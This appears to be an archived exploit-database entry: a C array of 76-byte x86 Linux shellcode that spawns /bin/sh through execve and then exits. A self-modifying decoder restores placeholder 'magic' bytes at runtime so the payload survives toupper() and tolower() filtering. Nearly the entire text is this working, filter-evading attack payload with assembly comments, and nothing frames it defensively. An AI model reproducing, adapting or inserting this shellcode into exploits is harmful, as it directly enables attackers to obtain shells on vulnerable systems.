47 lines
No EOL
2.6 KiB
C
47 lines
No EOL
2.6 KiB
C
/*-------------------------------------------------------*/
|
|
/* Magic Byte Self Modifying Code for surviving */
|
|
/* toupper() & tolower() */
|
|
/* 76bytes execve() _exit() code by XORt */
|
|
/*-------------------------------------------------------*/
|
|
"\xeb\x34" /* jmp $0x34 [revert] */
|
|
"\x5e" /* pop %esi */
|
|
/*--set-up-variables-------------------------------------*/
|
|
"\x89\xf7" /* mov %esi, %edi */
|
|
"\x83\xef\x22" /* sub $0x22, %edi */
|
|
"\x31\xc9" /* xor %ecx, %ecx */
|
|
"\xb1\x8c" /* mov $0x8c, %cl */
|
|
"\xd1\xc9" /* ror $0x1, %ecx (70loops) */
|
|
/*-scan-for-magic-byte-----------------------------------*/
|
|
"\xb0\x7b" /* mov $0x7b, %al */
|
|
"\xf2\xae" /* repne scasb */
|
|
"\xff\xcf" /* dec %edi */
|
|
"\xac" /* lodsb (al=DS:SI) */
|
|
"\x28\x07" /* subb %al, (%edi) */
|
|
/*--loop-back-to-scanner---------------------------------*/
|
|
"\xe2\xf5" /* loop -$0xe [load-byte] */
|
|
/*-------------------------------------[length:25bytes]--*/
|
|
// //
|
|
/*--modified-shellcode-----------------------------------*/
|
|
"\x89\x7b\x08" /* movl %esi, 0x8(%esi) @*/
|
|
"\x91" /* xchg %eax, %ecx */
|
|
"\x88\x7b\x07" /* movb %al, 0x7(%esi) @*/
|
|
"\x89\x7b\x0c" /* movl %eax, 0xc(%esi) @*/
|
|
"\xb0\x0b" /* movb $0xb, %al */
|
|
"\x89\xf3" /* movl %esi, %ebx */
|
|
"\x8d\x7b\x08" /* leal 0x8(%esi), %ecx @*/
|
|
"\x8d\x7b\x0c" /* leal 0xc(%esi), %edx @*/
|
|
"\xcd\x80" /* int $0x80 */
|
|
"\x31\xdb" /* xorl %ebx, %ebx */
|
|
"\x89\xd8" /* movl %ebx, %eax */
|
|
"\x40" /* inc %eax */
|
|
"\xcd\x80" /* int $0x80 */
|
|
/*--revert-----------------------------------------------*/
|
|
"\xe8\xc7\xff\xff\xff" /* call -$0x39 */
|
|
/*--offset-table-----------------------------------------*/
|
|
"\x05\x35\x35\x2d\x25\x19\x12\x0d\x08\x13" /**/
|
|
/*--string-to-run----------------------------------------*/
|
|
"/\x7b\x7b\x7b/\x7b\x7b" /* .string "/bin/sh" */
|
|
/*--------------------------------------[length:51bytes]-*/
|
|
|
|
|
|
// milw0rm.com [2004-12-22]
|